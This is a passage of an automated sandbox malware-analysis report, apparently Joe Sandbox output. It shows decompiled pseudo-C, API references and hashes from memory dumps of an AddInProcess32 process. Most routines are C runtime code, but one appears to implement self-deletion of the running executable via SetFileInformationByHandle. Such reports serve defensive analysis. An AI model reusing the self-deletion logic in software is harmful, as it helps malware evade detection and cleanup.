                                              									 *(_t50 + 0x70) =  *(_t50 + 0x70) & 0xfffffffd;
                                              								}
                                              								return _t50 | 0xffffffff;
                                              							}
                                              							_t50 = _v20;
                                              							_t15 = _t50 + 0xac; // 0xa045ff98
                                              							_t63 =  *_t15;
                                              							if(_t63 <= 1 || _a12 < _t63) {
                                              								L17:
                                              								_t24 = _t50 + 0xac; // 0xa045ff98
                                              								if(_a12 <  *_t24 || _t69[1] == 0) {
                                              									goto L21;
                                              								} else {
                                              									goto L19;
                                              								}
                                              							} else {
                                              								_t21 = _t50 + 4; // 0x840ffff8
                                              								_t56 = MultiByteToWideChar( *_t21, 9, _t69, _t63, _a4, 0 | _a4 != 0x00000000);
                                              								_t50 = _v20;
                                              								if(_t56 != 0) {
                                              									L19:
                                              									_t27 = _t50 + 0xac; // 0xa045ff98
                                              									_t55 =  *_t27;
                                              									if(_v8 == 0) {
                                              										return _t55;
                                              									}
                                              									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                                              									return _t55;
                                              								}
                                              								goto L17;
                                              							}
                                              						}
                                              						_t57 = _a4;
                                              						if(_t57 != 0) {
                                              							 *_t57 =  *_t69 & 0x000000ff;
                                              						}
                                              						goto L10;
                                              					} else {
                                              						_t58 = _a4;
                                              						if(_t58 != 0) {
                                              							 *_t58 = 0;
                                              						}
                                              						goto L5;
                                              					}
                                              				}
                                              			}













                                              0x00409073
                                              0x0040907a
                                              0x0040908f
                                              0x00000000
                                              0x00409081
                                              0x00409083
                                              0x0040909b
                                              0x004090a6
                                              0x004090d8
                                              0x0040916b
                                              0x0040916e
                                              0x00409176
                                              0x004090b6
                                              0x004090b9
                                              0x004090be
                                              0x004090be
                                              0x00000000
                                              0x004090c4
                                              0x00409138
                                              0x00409138
                                              0x0040913d
                                              0x00409146
                                              0x00409148
                                              0x0040914b
                                              0x0040914b
                                              0x00000000
                                              0x0040914f
                                              0x004090da
                                              0x004090dd
                                              0x004090dd
                                              0x004090e6
                                              0x0040910d
                                              0x00409110
                                              0x00409116
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004090ed
                                              0x004090fd
                                              0x00409100
                                              0x00409108
                                              0x0040910b
                                              0x0040911d
                                              0x00409120
                                              0x00409120
                                              0x00409126
                                              0x00409094
                                              0x00409094
                                              0x0040912f
                                              0x00000000
                                              0x0040912f
                                              0x00000000
                                              0x0040910b
                                              0x004090e6
                                              0x004090a8
                                              0x004090ad
                                              0x004090b3
                                              0x004090b3
                                              0x00000000
                                              0x00409085
                                              0x00409085
                                              0x0040908a
                                              0x0040908c
                                              0x0040908c
                                              0x00000000
                                              0x0040908a
                                              0x00409083

                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040909B
                                              • __isleadbyte_l.LIBCMT ref: 004090CF
                                              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,00408678,?,?,00000002), ref: 00409100
                                              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,00408678,?,?,00000002), ref: 0040916E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID: pYqt
                                              • API String ID: 3058430110-1213896493
                                              • Opcode ID: 3fc5b2d2f1e3e2c4c861b4164b33fcbf6a78946a5b9e7531fab444a04c299768
                                              • Instruction ID: 60a8676b7946a16de792e5a19dc617b5d93a58ec6caea168880f03a11062425c
                                              • Opcode Fuzzy Hash: 3fc5b2d2f1e3e2c4c861b4164b33fcbf6a78946a5b9e7531fab444a04c299768
                                              • Instruction Fuzzy Hash: F231C031B00246EFEB20DFA4C8849AA7BA5AF00311F1485BAE5A4AF2D2D7359D40DB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 85%
                                              			E00408DC9(void* __edx, signed int _a4, signed char** _a8) {
                                              				signed int _v8;
                                              				char _v16;
                                              				char _v20;
                                              				void* __ebx;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t39;
                                              				signed short _t42;
                                              				void* _t44;
                                              				void* _t48;
                                              				void* _t52;
                                              				signed short _t55;
                                              				signed int _t59;
                                              				signed int _t69;
                                              				signed int _t75;
                                              				void* _t81;
                                              				void* _t82;
                                              				signed short _t84;
                                              				signed char* _t98;
                                              				signed char* _t107;
                                              				signed char* _t109;
                                              				void* _t117;
                                              				signed char** _t122;
                                              				void* _t123;
                                              				signed int _t124;
                                              
                                              				_t117 = __edx;
                                              				_t39 =  *0x413004; // 0x98fc836b
                                              				_v8 = _t39 ^ _t124;
                                              				_t122 = _a8;
                                              				if((_t122[3] & 0x00000040) != 0) {
                                              					L34:
                                              					_t34 =  &(_t122[1]);
                                              					 *_t34 =  &(_t122[1][0xfffffffffffffffe]);
                                              					if( *_t34 < 0) {
                                              						_t42 = E0040BE3B(_t117, _a4 & 0x0000ffff, _t122);
                                              					} else {
                                              						_t42 = _a4;
                                              						 *( *_t122) = _t42;
                                              						 *_t122 =  &(( *_t122)[2]);
                                              					}
                                              					L37:
                                              					_pop(_t123);
                                              					_pop(_t81);
                                              					E0040318A(_t42, _t81, _v8 ^ _t124, _t123);
                                              					return _t42;
                                              				}
                                              				if(E00408D9C(_t122) == 0xffffffff || E00408D9C(_t122) == 0xfffffffe) {
                                              					_t44 = 0x413a18;
                                              				} else {
                                              					_t75 = E00408D9C(_t122);
                                              					_t44 = (E00408D9C(_t122) & 0x0000001f) * 0x38 +  *((intOrPtr*)(0x415ae0 + (_t75 >> 5) * 4));
                                              				}
                                              				_t8 = _t44 + 0x24; // 0x0
                                              				if(( *_t8 & 0x0000007f) == 2) {
                                              					goto L34;
                                              				} else {
                                              					if(E00408D9C(_t122) == 0xffffffff || E00408D9C(_t122) == 0xfffffffe) {
                                              						_t48 = 0x413a18;
                                              					} else {
                                              						_t69 = E00408D9C(_t122);
                                              						_t48 = (E00408D9C(_t122) & 0x0000001f) * 0x38 +  *((intOrPtr*)(0x415ae0 + (_t69 >> 5) * 4));
                                              					}
                                              					_t11 = _t48 + 0x24; // 0x0
                                              					if(( *_t11 & 0x0000007f) != 1) {
                                              						if(E00408D9C(_t122) == 0xffffffff || E00408D9C(_t122) == 0xfffffffe) {
                                              							_t52 = 0x413a18;
                                              						} else {
                                              							_t59 = E00408D9C(_t122);
                                              							_t52 = (E00408D9C(_t122) & 0x0000001f) * 0x38 +  *((intOrPtr*)(0x415ae0 + (_t59 >> 5) * 4));
                                              						}
                                              						if(( *(_t52 + 4) & 0x00000080) == 0) {
                                              							goto L34;
                                              						} else {
                                              							_t55 = E0040C10A( &_v20,  &_v16, 5, _a4);
                                              							if(_t55 != 0) {
                                              								goto L15;
                                              							}
                                              							_t82 = 0;
                                              							if(_v20 <= 0) {
                                              								L33:
                                              								_t42 = _a4;
                                              								goto L37;
                                              							} else {
                                              								goto L28;
                                              							}
                                              							while(1) {
                                              								L28:
                                              								_t26 =  &(_t122[1]);
                                              								 *_t26 = _t122[1] - 1;
                                              								if( *_t26 < 0) {
                                              									_t55 = E00404C86( *((char*)(_t124 + _t82 - 0xc)), _t122);
                                              								} else {
                                              									 *( *_t122) =  *((intOrPtr*)(_t124 + _t82 - 0xc));
                                              									_t98 =  *_t122;
                                              									_t55 =  *_t98 & 0x000000ff;
                                              									 *_t122 =  &(_t98[1]);
                                              								}
                                              								if(_t55 == 0xffffffff) {
                                              									goto L15;
                                              								}
                                              								_t82 = _t82 + 1;
                                              								if(_t82 < _v20) {
                                              									continue;
                                              								}
                                              								goto L33;
                                              							}
                                              							goto L15;
                                              						}
                                              					} else {
                                              						_t12 =  &(_t122[1]);
                                              						 *_t12 = _t122[1] - 1;
                                              						_t84 = _a4;
                                              						if( *_t12 < 0) {
                                              							_t55 = E00404C86(_t84, _t122);
                                              						} else {
                                              							 *( *_t122) = _t84;
                                              							_t109 =  *_t122;
                                              							_t55 =  *_t109 & 0x000000ff;
                                              							 *_t122 =  &(_t109[1]);
                                              						}
                                              						if(_t55 != 0xffffffff) {
                                              							_t15 =  &(_t122[1]);
                                              							 *_t15 = _t122[1] - 1;
                                              							if( *_t15 < 0) {
                                              								_t55 = E00404C86(_t84, _t122);
                                              							} else {
                                              								 *( *_t122) = _t84;
                                              								_t107 =  *_t122;
                                              								_t55 =  *_t107 & 0x000000ff;
                                              								 *_t122 =  &(_t107[1]);
                                              							}
                                              							if(_t55 == 0xffffffff) {
                                              								goto L15;
                                              							} else {
                                              								_t42 = _t84;
                                              								goto L37;
                                              							}
                                              						} else {
                                              							L15:
                                              							_t42 = _t55 | 0x0000ffff;
                                              							goto L37;
                                              						}
                                              					}
                                              				}
                                              			}




























                                              0x00408dc9
                                              0x00408dcf
                                              0x00408dd6
                                              0x00408ddb
                                              0x00408de3
                                              0x00408f78
                                              0x00408f78
                                              0x00408f78
                                              0x00408f7c
                                              0x00408f91
                                              0x00408f7e
                                              0x00408f80
                                              0x00408f83
                                              0x00408f86
                                              0x00408f86
                                              0x00408f98
                                              0x00408f9c
                                              0x00408f9f
                                              0x00408fa0
                                              0x00408fa6
                                              0x00408fa6
                                              0x00408df8
                                              0x00408e28
                                              0x00408e06
                                              0x00408e07
                                              0x00408e22
                                              0x00408e25
                                              0x00408e2a
                                              0x00408e31
                                              0x00000000
                                              0x00408e37
                                              0x00408e41
                                              0x00408e71
                                              0x00408e4f
                                              0x00408e50
                                              0x00408e6b
                                              0x00408e6e
                                              0x00408e73
                                              0x00408e7a
                                              0x00408ee2
                                              0x00408f12
                                              0x00408ef0
                                              0x00408ef1
                                              0x00408f0c
                                              0x00408f0f
                                              0x00408f18
                                              0x00000000
                                              0x00408f1a
                                              0x00408f27
                                              0x00408f31
                                              0x00000000
                                              0x00000000
                                              0x00408f37
                                              0x00408f3c
                                              0x00408f72
                                              0x00408f72
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00408f3e
                                              0x00408f3e
                                              0x00408f3e
                                              0x00408f3e
                                              0x00408f41
                                              0x00408f5c
                                              0x00408f43
                                              0x00408f49
                                              0x00408f4b
                                              0x00408f4d
                                              0x00408f51
                                              0x00408f51
                                              0x00408f66
                                              0x00000000
                                              0x00000000
                                              0x00408f6c
                                              0x00408f70
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00408f70
                                              0x00000000
                                              0x00408f3e
                                              0x00408e7c
                                              0x00408e7c
                                              0x00408e7c
                                              0x00408e7f
                                              0x00408e82
                                              0x00408e97
                                              0x00408e84
                                              0x00408e86
                                              0x00408e88
                                              0x00408e8a
                                              0x00408e8e
                                              0x00408e8e
                                              0x00408ea1
                                              0x00408eac
                                              0x00408eac
                                              0x00408eaf
                                              0x00408ec4
                                              0x00408eb1
                                              0x00408eb3
                                              0x00408eb5
                                              0x00408eb7
                                              0x00408ebb
                                              0x00408ebb
                                              0x00408ece
                                              0x00000000
                                              0x00408ed0
                                              0x00408ed0
                                              0x00000000
                                              0x00408ed0
                                              0x00408ea3
                                              0x00408ea3
                                              0x00408ea3
                                              0x00000000
                                              0x00408ea3
                                              0x00408ea1
                                              0x00408e7a

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: __flsbuf$__flswbuf_wctomb_s
                                              • String ID:
                                              • API String ID: 3257920507-0
                                              • Opcode ID: ca31858a28c25628787a6cd13da6845824825ffbc45749ff7d1aa03c197881a4
                                              • Instruction ID: e3320308620aae82afad94c34382f6534f6cf98c8d3c2b43a25689cd414ae7a4
                                              • Opcode Fuzzy Hash: ca31858a28c25628787a6cd13da6845824825ffbc45749ff7d1aa03c197881a4
                                              • Instruction Fuzzy Hash: 9B5127721196119ECB249B38DA818AB37A8DF16335330073FF5E1EB2D1DE3C9502869D
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 88%
                                              			E02B5138F(void* __ebx, void* __edi, void* __esi) {
                                              				signed int _v8;
                                              				char _v532;
                                              				short _v1052;
                                              				struct _MEMORY_BASIC_INFORMATION _v1080;
                                              				char _v1084;
                                              				char _v1088;
                                              				signed int _t14;
                                              				void* _t16;
                                              				long _t18;
                                              				long _t21;
                                              				long _t22;
                                              				long _t23;
                                              				signed int _t44;
                                              				signed int _t46;
                                              
                                              				_t40 = __edi;
                                              				_t28 = __ebx;
                                              				_t46 = (_t44 & 0xfffffff8) - 0x43c;
                                              				_t14 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t14 ^ _t46;
                                              				_push(__esi);
                                              				_v1088 = 0;
                                              				_t16 = GetModuleHandleA(0);
                                              				if(_t16 == 0 || VirtualQuery(_t16,  &_v1080, 0x1000) == 0) {
                                              					L4:
                                              					_t18 = GetModuleFileNameW(0,  &_v1052, 0x103);
                                              					__eflags = _t18;
                                              					if(_t18 != 0) {
                                              						_t21 = E02B529B2( &_v1052,  &_v1088,  &_v1084);
                                              						__eflags = _t21;
                                              						if(_t21 != 0) {
                                              							_t22 = E02B52D50(_t28, _t40, 0);
                                              							__eflags = _t22;
                                              							if(_t22 != 0) {
                                              								_t23 = E02B52AC6(_t28,  &_v532, 0x2b57468, _t40, 0, 0x1c00);
                                              								_pop(_t34);
                                              								__eflags = _t23;
                                              								if(__eflags != 0) {
                                              									E02B522F0(_t28,  &_v532, _v1088, _t40, 0, __eflags, _v1084, 0);
                                              									_t46 = _t46 + 0xc;
                                              								}
                                              							}
                                              						}
                                              					}
                                              					goto L9;
                                              				} else {
                                              					_t49 = _v1080.Protect - 0x40;
                                              					if(_v1080.Protect != 0x40) {
                                              						goto L4;
                                              					} else {
                                              						E02B52D50(__ebx, __edi, 0);
                                              						E02B51000(__ebx, __edi, 0, _t49);
                                              						L9:
                                              						return E02B53C33(_v8 ^ _t46);
                                              					}
                                              				}
                                              			}

















                                              0x02b5138f
                                              0x02b5138f
                                              0x02b51395
                                              0x02b5139b
                                              0x02b513a2
                                              0x02b513a9
                                              0x02b513ad
                                              0x02b513b1
                                              0x02b513b9
                                              0x02b513e3
                                              0x02b513ee
                                              0x02b513f4
                                              0x02b513f6
                                              0x02b51405
                                              0x02b5140b
                                              0x02b5140d
                                              0x02b5140f
                                              0x02b51414
                                              0x02b51416
                                              0x02b51429
                                              0x02b5142e
                                              0x02b5142f
                                              0x02b51431
                                              0x02b51444
                                              0x02b51449
                                              0x02b51449
                                              0x02b51431
                                              0x02b51416
                                              0x02b5140d
                                              0x00000000
                                              0x02b513d0
                                              0x02b513d0
                                              0x02b513d5
                                              0x00000000
                                              0x02b513d7
                                              0x02b513d7
                                              0x02b513dc
                                              0x02b5144c
                                              0x02b5145e
                                              0x02b5145e
                                              0x02b513d5

                                              APIs
                                              • GetModuleHandleA.KERNEL32(00000000), ref: 02B513B1
                                              • VirtualQuery.KERNEL32(00000000,?,00001000), ref: 02B513C6
                                                • Part of subcall function 02B52D50: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 02B52D93
                                                • Part of subcall function 02B52D50: CreateFileW.KERNEL32(?,00010000,00000000,00000000,00000003,00000080,00000000,?,00000000), ref: 02B52DAF
                                                • Part of subcall function 02B52D50: SetFileInformationByHandle.KERNEL32(00000000,00000003,?,?), ref: 02B52DF1
                                                • Part of subcall function 02B52D50: CloseHandle.KERNEL32(00000000), ref: 02B52E04
                                                • Part of subcall function 02B52D50: CreateFileW.KERNEL32(?,00010000,00000000,00000000,00000003,00000080,00000000), ref: 02B52E1E
                                                • Part of subcall function 02B52D50: SetFileInformationByHandle.KERNEL32(00000000,00000004,?,00000001), ref: 02B52E3E
                                                • Part of subcall function 02B52D50: CloseHandle.KERNEL32(00000000), ref: 02B52E47
                                                • Part of subcall function 02B51000: GetProcessHeap.KERNEL32(00000008,00200000,?,00000000), ref: 02B51026
                                                • Part of subcall function 02B51000: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02B5102D
                                                • Part of subcall function 02B51000: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,00000000), ref: 02B510E5
                                                • Part of subcall function 02B51000: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02B510EC
                                                • Part of subcall function 02B51000: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02B5112C
                                                • Part of subcall function 02B51000: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02B51133
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 02B513EE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: FileHeap$Handle$ModuleProcess$AllocCloseCreateInformationName$FreeQueryVirtual
                                              • String ID: @
                                              • API String ID: 1754921816-2766056989
                                              • Opcode ID: e3d1c281258557e224337659cea260c4033d2a54745456dba05319395f732670
                                              • Instruction ID: d6538d423489bd5b9aedca3d80821de64701dbbe9993fe36e1ef5757e1795148
                                              • Opcode Fuzzy Hash: e3d1c281258557e224337659cea260c4033d2a54745456dba05319395f732670
                                              • Instruction Fuzzy Hash: 4E1106316143219BD720EB64D851BAB77A8EF44394F084A5DFD889E180EF70D645CBA3
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00401800(void* __ebx, intOrPtr* __edi, void* __esi) {
                                              				void* _t16;
                                              				void* _t18;
                                              				void* _t19;
                                              				intOrPtr* _t25;
                                              				signed int _t27;
                                              				char _t29;
                                              				void* _t30;
                                              
                                              				_t25 = __edi;
                                              				_t19 = __ebx;
                                              				_t29 = 0;
                                              				if(__edi != 0) {
                                              					_t27 = 0;
                                              					if( *__edi > 0) {
                                              						while(1) {
                                              							_t16 = E0040346A( *((intOrPtr*)(_t19 + _t27 * 4)),  *((intOrPtr*)(_t19 + _t27 * 4)), L"/accepteula");
                                              							_t30 = _t30 + 8;
                                              							if(_t16 == 0) {
                                              								break;
                                              							}
                                              							_t18 = E0040346A(_t16,  *((intOrPtr*)(_t19 + _t27 * 4)), L"-accepteula");
                                              							_t30 = _t30 + 8;
                                              							if(_t18 == 0) {
                                              								break;
                                              							} else {
                                              								_t27 = _t27 + 1;
                                              								if(_t27 <  *_t25) {
                                              									continue;
                                              								} else {
                                              								}
                                              							}
                                              							goto L10;
                                              						}
                                              						_t29 = 1;
                                              						while(_t27 <  *_t25 - 1) {
                                              							 *((intOrPtr*)(_t19 + _t27 * 4)) =  *((intOrPtr*)(_t19 + 4 + _t27 * 4));
                                              							_t27 = _t27 + 1;
                                              						}
                                              						 *_t25 =  *_t25 + 0xffffffff;
                                              					}
                                              					L10:
                                              				}
                                              				if(E00401470(_t29) != 0) {
                                              					_t29 = 1;
                                              				}
                                              				return 0 | _t29 != 0x00000000;
                                              			}










                                              0x00401800
                                              0x00401800
                                              0x00401801
                                              0x00401805
                                              0x00401808
                                              0x0040180c
                                              0x00401810
                                              0x00401819
                                              0x0040181e
                                              0x00401823
                                              0x00000000
                                              0x00000000
                                              0x0040182e
                                              0x00401833
                                              0x00401838
                                              0x00000000
                                              0x0040183a
                                              0x0040183a
                                              0x0040183f
                                              0x00000000
                                              0x00000000
                                              0x00401841
                                              0x0040183f
                                              0x00000000
                                              0x00401838
                                              0x00401845
                                              0x0040184e
                                              0x00401854
                                              0x00401859
                                              0x0040185d
                                              0x00401861
                                              0x00401861
                                              0x00401864
                                              0x00401864
                                              0x00401870
                                              0x00401872
                                              0x00401872
                                              0x0040187f

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: __wcsicmp
                                              • String ID: -accepteula$/accepteula
                                              • API String ID: 1389419275-3604086781
                                              • Opcode ID: ba85f18d7fde8d1ccc12eb71a396890943377c3b439308736d5df5222ea4d1bc
                                              • Instruction ID: ae80dfe79650e11862fde2afe1a2a16d5d6f03895628a9dbedd2dac65a09cae5
                                              • Opcode Fuzzy Hash: ba85f18d7fde8d1ccc12eb71a396890943377c3b439308736d5df5222ea4d1bc
                                              • Instruction Fuzzy Hash: F1012473D0022A87CB307EBA9C41B6B77486B50348F11863AAC59B73D2EA79DE50C695
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 70%
                                              			E004065E8(void* __ebx, void* __edx) {
                                              				void* __edi;
                                              				void* __esi;
                                              				long _t3;
                                              				void* _t9;
                                              				long _t12;
                                              				void* _t20;
                                              				long _t21;
                                              				long* _t22;
                                              
                                              				_t20 = __edx;
                                              				_t3 = GetLastError();
                                              				_push( *0x4138c0);
                                              				_t21 = _t3;
                                              				_t22 =  *((intOrPtr*)(E004064BA()))();
                                              				if(_t22 == 0) {
                                              					_t22 = E00407C87(1, 0x214);
                                              					if(_t22 != 0) {
                                              						_push(_t22);
                                              						_push( *0x4138c0);
                                              						_t9 =  *((intOrPtr*)(E00406443( *0x4144f8)))();
                                              						_t25 = _t9;
                                              						if(_t9 == 0) {
                                              							_push(_t22);
                                              							E00403199(_t20, _t22, __eflags);
                                              							_t22 = 0;
                                              							__eflags = 0;
                                              						} else {
                                              							_push(0);
                                              							_push(_t22);
                                              							E00406529(__ebx, _t21, _t22, _t25);
                                              							_t12 = GetCurrentThreadId();
                                              							_t22[1] = _t22[1] | 0xffffffff;
                                              							 *_t22 = _t12;
                                              						}
                                              					}
                                              				}
                                              				SetLastError(_t21);
                                              				return _t22;
                                              			}











                                              0x004065e8
                                              0x004065ea
                                              0x004065f0
                                              0x004065f6
                                              0x004065ff
                                              0x00406603
                                              0x00406611
                                              0x00406617
                                              0x00406619
                                              0x0040661a
                                              0x0040662c
                                              0x0040662e
                                              0x00406630
                                              0x0040664a
                                              0x0040664b
                                              0x00406651
                                              0x00406651
                                              0x00406632
                                              0x00406632
                                              0x00406634
                                              0x00406635
                                              0x0040663c
                                              0x00406642
                                              0x00406646
                                              0x00406646
                                              0x00406630
                                              0x00406617
                                              0x00406654
                                              0x0040665e

                                              APIs
                                              • GetLastError.KERNEL32(00000000,?,00406665,?,004085BE,00000000,00000000,00000000), ref: 004065EA
                                                • Part of subcall function 004064BA: TlsGetValue.KERNEL32(?,004065FD), ref: 004064C1
                                                • Part of subcall function 004064BA: TlsSetValue.KERNEL32(00000000), ref: 004064E2
                                              • __calloc_crt.LIBCMT ref: 0040660C
                                                • Part of subcall function 00407C87: __calloc_impl.LIBCMT ref: 00407C95
                                                • Part of subcall function 00407C87: Sleep.KERNEL32(00000000,00406611,00000001,00000214), ref: 00407CAC
                                                • Part of subcall function 00406443: TlsGetValue.KERNEL32(?,00406ED3,004035FD,?,?,00401E38,00000000,?,?), ref: 00406450
                                                • Part of subcall function 00406443: TlsGetValue.KERNEL32(FFFFFFFF,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00406467
                                                • Part of subcall function 00406529: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00411A98,0000000C,0040663A,00000000,00000000), ref: 0040653A
                                                • Part of subcall function 00406529: GetProcAddress.KERNEL32(?,EncodePointer), ref: 0040656E
                                                • Part of subcall function 00406529: GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040657E
                                                • Part of subcall function 00406529: InterlockedIncrement.KERNEL32(004132A8), ref: 004065A0
                                                • Part of subcall function 00406529: ___addlocaleref.LIBCMT ref: 004065C7
                                              • GetCurrentThreadId.KERNEL32 ref: 0040663C
                                              • SetLastError.KERNEL32(00000000), ref: 00406654
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl
                                              • String ID:
                                              • API String ID: 4195734883-0
                                              • Opcode ID: 0a1dba65162e7cf836f553f42e2d84d0de64361cde726b6ef0bf73927a476e36
                                              • Instruction ID: 6acc180e9db3e0c08f8946cbde5c9b75496807f8aa197502050a49a5b2d53bc3
                                              • Opcode Fuzzy Hash: 0a1dba65162e7cf836f553f42e2d84d0de64361cde726b6ef0bf73927a476e36
                                              • Instruction Fuzzy Hash: 13F04C324002226BD2313BB5BC0668A3B95DF01BB9B12453FF542BA2D0DF3DC91182DD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 26%
                                              			E00401C30(signed int __ecx, void* __edx) {
                                              				void* __ebx;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t20;
                                              				short _t21;
                                              				signed int _t30;
                                              				void* _t32;
                                              				void* _t48;
                                              				short* _t49;
                                              				void* _t51;
                                              
                                              				_t49 = _t51 - 0x204;
                                              				_push(0xfffffffe);
                                              				_push(0x411d48);
                                              				_push(E00404AF0);
                                              				_push( *[fs:0x0]);
                                              				_t20 =  *0x413004; // 0x98fc836b
                                              				 *(_t49 - 8) =  *(_t49 - 8) ^ _t20;
                                              				_t21 = _t20 ^ _t49;
                                              				_t49[0x100] = _t21;
                                              				_push(_t21);
                                              				 *[fs:0x0] = _t49 - 0x10;
                                              				 *((intOrPtr*)(_t49 - 0x18)) = _t51 - 0x1f0;
                                              				 *(_t49 - 0x1c) = 0;
                                              				_push(_t49[0x108]);
                                              				_push(_t49[0x106] & 0x0000ffff);
                                              				E004032BD(_t49, 0x100, L"\\StringFileInfo\\%04X%04X\\%s", __ecx & 0x0000ffff);
                                              				 *((intOrPtr*)(_t49 - 4)) = 0;
                                              				 *(_t49 - 0x1c) = VerQueryValueW(__edx, _t49, _t49 - 0x20, _t49 - 0x24);
                                              				 *((intOrPtr*)(_t49 - 4)) = 0xfffffffe;
                                              				asm("sbb eax, eax");
                                              				_t30 =  ~( *(_t49 - 0x1c)) &  *(_t49 - 0x20);
                                              				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0x10));
                                              				_pop(_t48);
                                              				_pop(_t32);
                                              				E0040318A(_t30, _t32, _t49[0x100] ^ _t49, _t48);
                                              				return _t30;
                                              			}













                                              0x00401c31
                                              0x00401c3e
                                              0x00401c40
                                              0x00401c45
                                              0x00401c50
                                              0x00401c54
                                              0x00401c59
                                              0x00401c5c
                                              0x00401c5e
                                              0x00401c67
                                              0x00401c6b
                                              0x00401c71
                                              0x00401c7e
                                              0x00401c81
                                              0x00401c89
                                              0x00401c9c
                                              0x00401ca4
                                              0x00401cb9
                                              0x00401cc7
                                              0x00401cd3
                                              0x00401cd5
                                              0x00401cdb
                                              0x00401ce4
                                              0x00401ce5
                                              0x00401cee
                                              0x00401cfc

                                              APIs
                                              • _swprintf.LIBCMT ref: 00401C9C
                                                • Part of subcall function 004032BD: __vswprintf_s_l.LIBCMT ref: 004032D0
                                              • VerQueryValueW.VERSION(00000000,?,?,?,?,?,98FC836B,?,00000000,00000000,?,?,00404AF0,00411D48,000000FE), ref: 00401CB4
                                              Strings
                                              • \StringFileInfo\%04X%04X\%s, xrefs: 00401C8E
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: QueryValue__vswprintf_s_l_swprintf
                                              • String ID: \StringFileInfo\%04X%04X\%s
                                              • API String ID: 4007372565-3176804452
                                              • Opcode ID: 2665c408c1388923a7c9a331660d97ad6d30d5893696d7202d0593747b124ff4
                                              • Instruction ID: 16fea18b266e5000ac73c5f0c1a7a8be829457a3a8ce474c65f6ca9c4e30ee4f
                                              • Opcode Fuzzy Hash: 2665c408c1388923a7c9a331660d97ad6d30d5893696d7202d0593747b124ff4
                                              • Instruction Fuzzy Hash: 242169B2940248ABDB20DF95DC45FEE77F8FB48710F10465EF515A7181D6785604CB64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 68%
                                              			E02B528DA(short* __ecx, void* __esi) {
                                              				signed int _v8;
                                              				short _v524;
